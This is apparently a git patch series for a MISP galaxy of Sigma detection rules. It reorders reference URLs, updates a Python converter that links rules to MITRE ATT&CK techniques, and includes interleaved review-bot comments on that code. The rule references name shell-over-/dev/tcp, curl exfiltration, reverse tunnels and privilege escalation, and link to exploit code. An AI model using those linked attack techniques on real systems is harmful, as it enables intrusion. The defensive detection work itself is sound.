- "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md",
+ "https://linux.die.net/man/8/pam_tty_audit",
 "https://access.redhat.com/articles/4409591#audit-record-types-2",
+ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml"
 ],
 "tags": [
@@ -81153,9 +81153,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files",
 "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
 "https://access.redhat.com/articles/4409591#audit-record-types-2",
+ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml"
 ],
 "tags": [
@@ -81188,9 +81188,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
+ "https://book.hacktricks.xyz/shells/shells/linux",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan",
 "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
- "https://book.hacktricks.xyz/shells/shells/linux",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml"
 ],
 "tags": [ 
@@ -81460,8 +81460,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
- "https://linux.die.net/man/8/useradd",
 "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid",
+ "https://linux.die.net/man/8/useradd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml"
 ],
 "tags": [
@@ -81502,8 +81502,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/Immersive-Labs-Sec/nimbuspwn",
 "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/",
+ "https://github.com/Immersive-Labs-Sec/nimbuspwn",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml"
 ],
 "tags": [
@@ -81617,8 +81617,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "http://pastebin.com/FtygZ1cg",
 "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
+ "http://pastebin.com/FtygZ1cg",
 "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html",
 "https://artkond.com/2017/03/23/pivoting-guide/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" 
@@ -81654,8 +81654,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml",
- "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/",
 "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/",
+ "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml"
 ],
 "tags": [
@@ -81945,8 +81945,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c",
 "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
+ "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml"
 ],
 "tags": [
@@ -81980,8 +81980,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://twitter.com/matthieugarin/status/1183970598210412546",
- "https://www.openwall.com/lists/oss-security/2019/10/14/1",
 "https://access.redhat.com/security/cve/cve-2019-14287",
+ "https://www.openwall.com/lists/oss-security/2019/10/14/1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml"
 ],
 "tags": [
@@ -82212,8 +82212,8 @@
 "logsource.category": "file_event",
 "logsource.product": "linux",
 "refs": [
- "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
 "https://www.makeuseof.com/how-to-install-and-use-doas/",
+ "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml"
 ],
 "tags": [ 
@@ -82246,8 +82246,8 @@
 "logsource.category": "network_connection",
 "logsource.product": "linux",
 "refs": [
- "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent",
 "https://twitter.com/hakluke/status/1587733971814977537/photo/1",
+ "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml"
 ],
 "tags": [
@@ -82357,8 +82357,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://twitter.com/matthieugarin/status/1183970598210412546",
- "https://www.openwall.com/lists/oss-security/2019/10/14/1",
 "https://access.redhat.com/security/cve/cve-2019-14287",
+ "https://www.openwall.com/lists/oss-security/2019/10/14/1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml"
 ],
 "tags": [
@@ -82505,8 +82505,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://gtfobins.github.io/gtfobins/vimdiff/",
 "https://gtfobins.github.io/gtfobins/vim/",
+ "https://gtfobins.github.io/gtfobins/vimdiff/",
 "https://gtfobins.github.io/gtfobins/rvim/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml"
 ],
@@ -82692,8 +82692,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md",
 "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml"
 ],
 "tags": [ 
@@ -82803,10 +82803,10 @@
 "logsource.product": "linux",
 "refs": [
 "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
- "https://twitter.com/d1r4c/status/1279042657508081664",
- "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
- "https://curl.se/docs/manpage.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
+ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
+ "https://twitter.com/d1r4c/status/1279042657508081664",
+ "https://curl.se/docs/manpage.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml"
 ],
 "tags": [
@@ -82847,8 +82847,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://gtfobins.github.io/gtfobins/apt-get/",
 "https://gtfobins.github.io/gtfobins/apt/",
+ "https://gtfobins.github.io/gtfobins/apt-get/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml"
 ],
 "tags": [
@@ -82872,9 +82872,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
+ "https://linuxize.com/post/how-to-delete-group-in-linux/",
 "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
 "https://www.cyberciti.biz/faq/linux-remove-user-command/",
- "https://linuxize.com/post/how-to-delete-group-in-linux/",
 "https://linux.die.net/man/8/userdel",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml"
 ], 
@@ -83381,9 +83381,9 @@
 "logsource.product": "linux",
 "refs": [
 "https://linux.die.net/man/8/groupdel",
+ "https://linuxize.com/post/how-to-delete-group-in-linux/",
 "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
 "https://www.cyberciti.biz/faq/linux-remove-user-command/",
- "https://linuxize.com/post/how-to-delete-group-in-linux/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml"
 ],
 "tags": [
@@ -83416,8 +83416,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
 "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html",
+ "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml"
 ],
 "tags": [
@@ -83451,8 +83451,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://github.com/carlospolop/PEASS-ng",
- "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes",
 "https://github.com/diego-treitos/linux-smart-enumeration",
+ "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml"
 ],
 "tags": [
@@ -83765,9 +83765,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.computerhope.com/unix/unohup.htm",
 "https://gtfobins.github.io/gtfobins/nohup/",
 "https://en.wikipedia.org/wiki/Nohup",
+ "https://www.computerhope.com/unix/unohup.htm",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml"
 ],
 "tags": "No established tags" 
@@ -83924,8 +83924,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.makeuseof.com/how-to-install-and-use-doas/",
 "https://research.splunk.com/endpoint/linux_doas_tool_execution/",
+ "https://www.makeuseof.com/how-to-install-and-use-doas/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml"
 ],
 "tags": [
@@ -84058,8 +84058,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://attack.mitre.org/techniques/T1548/001/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md",
+ "https://attack.mitre.org/techniques/T1548/001/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml"
 ],
 "tags": [
@@ -84161,8 +84161,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/",
 "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
+ "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml"
 ],
 "tags": [
@@ -84222,5 +84222,5 @@
 "value": "Security Software Discovery - Linux"
 }
 ],
- "version": 1
+ "version": "20230112"
 }
From 5804065e16f7deca8d75e0c2c027973bc8a3ab4c Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 14:16:20 +0100 Subject: [PATCH 11/13] chg: [tools] sigma tools updated --- tools/sigma/config.ini | 3 ++ tools/sigma/sigma-to-galaxy.py | 55 ++++++++++++++++++++++++++++++++-- 2 files changed, 55 insertions(+), 3 deletions(-) create mode 100644 tools/sigma/config.ini 
diff --git a/tools/sigma/config.ini b/tools/sigma/config.ini
new file mode 100644
index 0000000..8c4bab2
--- /dev/null
+++ b/tools/sigma/config.ini
@@ -0,0 +1,3 @@
+[MISP]
+cluster_path = ../../clusters/
+mitre_attack_cluster = mitre-attack-pattern.json
diff --git a/tools/sigma/sigma-to-galaxy.py b/tools/sigma/sigma-to-galaxy.py
index cde7a57..ef912e6 100644
--- a/tools/sigma/sigma-to-galaxy.py
+++ b/tools/sigma/sigma-to-galaxy.py
@@ -3,7 +3,7 @@ Author: Jose Luis Sanchez Martinez
 Twitter: @Joseliyo_Jstnk
 date: 2022/11/18
- Modified: 2022/12/05
+ Modified: 2023/01/03
 GitHub: https://github.com/jstnk9/MISP
 Description: This script can create MISP Galaxies from Sigma Rules. It can be done setting the path where you have stored your sigma rules in the system.
@@ -12,7 +12,7 @@ """
-import os, json, yaml, argparse, uuid
+import os, json, yaml, argparse, uuid, configparser, time
 unique_uuid = '9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2' 
@@ -22,10 +22,56 @@ def main(args):
 galaxyCluster = create_cluster(uuidGalaxy=unique_uuid)
 valuesData = create_cluster_value(args.inputPath, args.recursive, galaxyCluster)
 galaxyCluster["values"].extend(valuesData)
+ galaxyCluster = createRelations(galaxyCluster)
 create_cluster_json(galaxyCluster)
 check_duplicates(galaxyCluster)
+def createRelations(galaxyCluster):
+ """
+ :param galaxyCluster: Content of the cluster with all the values related to the Sigma Rules
+
+ :return galaxyCluster: Content of the cluster adding the relation between sigma rule and MITRE technique
+ """
+ for obj in galaxyCluster["values"]:
+ for attack in obj["meta"]["tags"]:
+ if attack.startswith("attack.t"):
+ with open(
+ config["MISP"]["cluster_path"]
+ + config["MISP"]["mitre_attack_cluster"],
+ "r",
+ ) as mitreCluster:
+ data = json.load(mitreCluster)
+ for technique in data["values"]:
+ if (
+ technique["meta"]["external_id"]
+ == attack.split(".", 1)[1].upper()
+ ):
+ if obj.get("related"):
+ obj["related"].append(
+ {
+ "dest-uuid": "%s" % (technique["uuid"]),
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to",
+ }
+ )
+ else:
+ obj["related"] = []
+ obj["related"].append(
+ {
+ "dest-uuid": "%s" % (technique["uuid"]),
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to",
+ }
+ )
+
+ return galaxyCluster
+ + + def check_duplicates(galaxy):
 """
 :param galaxy: Content of the cluster with all the values
@@ -81,6 +127,7 @@ def create_cluster(uuidGalaxy=unique_uuid):
 :return cluster: Dict with the basic information needed for the JSON file.
 """
+ version = time.strftime("%Y%m%d")
 cluster = {
 "authors": ["@Joseliyo_Jstnk"],
 "category": "rules",
@@ -90,7 +137,7 @@ def create_cluster(uuidGalaxy=unique_uuid):
 "type": "sigma-rules",
 "uuid": uuidGalaxy,
 "values": [],
- "version": 1,
+ "version": version
 }
 return cluster 
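Review bot: createRelations opens and json.load()s the whole MITRE ATT&CK cluster inside the innermost loop, once for every `attack.t*` tag of every rule, so the same file is re-parsed for each technique tag in the run; load it once before the loops and index the techniques by `external_id`, then look each tag up in that dict. The two branches under `if obj.get("related")` append the same dict and collapse to `obj.setdefault("related", []).append(...)`, which also avoids the `"%s" % (technique["uuid"])` formatting of a value that is already a string. The function also reads the module-level `config`, which is only bound under `if __name__ == '__main__'` in the hunk below, so calling main() or createRelations() from an import raises NameError; passing the config (or the pre-built technique map) in as a parameter would make that dependency explicit. The rewrite below keeps the signature, the docstring and the emitted relation object unchanged.
```python
def createRelations(galaxyCluster):
    # … unchanged: docstring …
    # Parse the ATT&CK cluster once and index technique uuids by external_id.
    with open(
        os.path.join(
            config["MISP"]["cluster_path"], config["MISP"]["mitre_attack_cluster"]
        ),
        "r",
    ) as mitreCluster:
        techniques = {
            technique["meta"]["external_id"]: technique["uuid"]
            for technique in json.load(mitreCluster)["values"]
        }
    for obj in galaxyCluster["values"]:
        for attack in obj["meta"]["tags"]:
            if not attack.startswith("attack.t"):
                continue
            techniqueUuid = techniques.get(attack.split(".", 1)[1].upper())
            if techniqueUuid is None:
                continue
            obj.setdefault("related", []).append(
                {
                    "dest-uuid": techniqueUuid,
                    "tags": [
                        "estimative-language:likelihood-probability=\"almost-certain\""
                    ],
                    "type": "related-to",
                }
            )
    return galaxyCluster
```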
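Review bot: `version = time.strftime("%Y%m%d")` in the @@ -81 hunk is a str, and the @@ -90 hunk writes it into the cluster as-is, which is why the generated file above now ends with `"version": "20230112"` instead of an integer; PATCH 12 below corrects the generated JSON but its diffstat touches only clusters/sigma-rules.json, so the next run of this tool would presumably reintroduce the string unless the line becomes `version = int(time.strftime("%Y%m%d"))`. Separately, the `refs` arrays in clusters/sigma-rules.json are reordered on every regeneration (compare the PATCH 12 hunks below, where a version fix churns over two thousand lines), which suggests the refs are collected into an unordered structure somewhere outside this hunk; emitting them in source order or sorted would confine regeneration diffs to the intended change.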
@@ -197,6 +244,8 @@ def create_galaxy_json(): if __name__ == '__main__': + config = configparser.ConfigParser() + config.read("config.ini") parser = argparse.ArgumentParser( description="This script can convert your sigma rules in MISP galaxies, generating both files needed for cluster and galaxies. If you need more information about how to import it, please, go to https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma" ) From 323f9f47a11dadb95cb072b7fdb06f40d3ab0252 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 16:45:21 +0100 Subject: [PATCH 12/13] chg: [sigma] version must be an integer --- clusters/sigma-rules.json | 2192 +++++++++++++++++++------------------ 1 file changed, 1108 insertions(+), 1084 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index 504a13a..f7a6bd3 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -174,9 +174,9 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": "No established tags" @@ -197,8 +197,8 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" ], "tags": [ 
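Review bot: `config.read("config.ini")` resolves the path against the current working directory and silently returns an empty list when the file is missing, so running the script from anywhere other than `tools/sigma/` surfaces later as an opaque `KeyError: 'MISP'` in `createRelations` rather than a clear message; the relative `cluster_path = ../../clusters/` in the new config.ini has the same CWD dependence. Resolve the file next to the script and fail early: `config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "config.ini")` followed by `if not config.read(config_file): raise SystemExit("config not found: %s" % config_file)`, and join `cluster_path` against that same directory when it is relative. Because `config` is only bound under the `__main__` guard, any caller that imports this module and invokes `createRelations` will hit NameError, which is one more reason to pass the paths in explicitly rather than through a global.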
@@ -232,10 +232,10 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://core.telegram.org/bots/faq", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ @@ -460,8 +460,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://twitter.com/stvemillertime/status/1024707932447854592", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://twitter.com/stvemillertime/status/1024707932447854592", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ 
@@ -1330,9 +1330,9 @@ "logsource.product": "zeek", "refs": [ "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -1441,8 +1441,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29", "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/OTRF/detection-hackathon-apt29", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" ], "tags": [ @@ -1700,9 +1700,9 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/Maka8ka/NGLite", "https://github.com/nknorg/nkn-sdk-go", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], "tags": [ 
@@ -1777,8 +1777,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29", "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/OTRF/detection-hackathon-apt29", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" ], "tags": [ @@ -1843,12 +1843,12 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://github.com/corelight/CVE-2021-1675", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ 
@@ -1971,9 +1971,9 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://tools.ietf.org/html/rfc2929#section-2.1", "https://twitter.com/neu5ron/status/1346245602502443009", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], @@ -2148,10 +2148,10 @@ "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ - "http://edgeguides.rubyonrails.org/security.html", - "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "http://guides.rubyonrails.org/action_controller_overview.html", + "http://edgeguides.rubyonrails.org/security.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ 
@@ -2184,10 +2184,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ @@ -2211,10 +2211,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ 
@@ -2237,8 +2237,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" @@ -2299,8 +2299,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" 
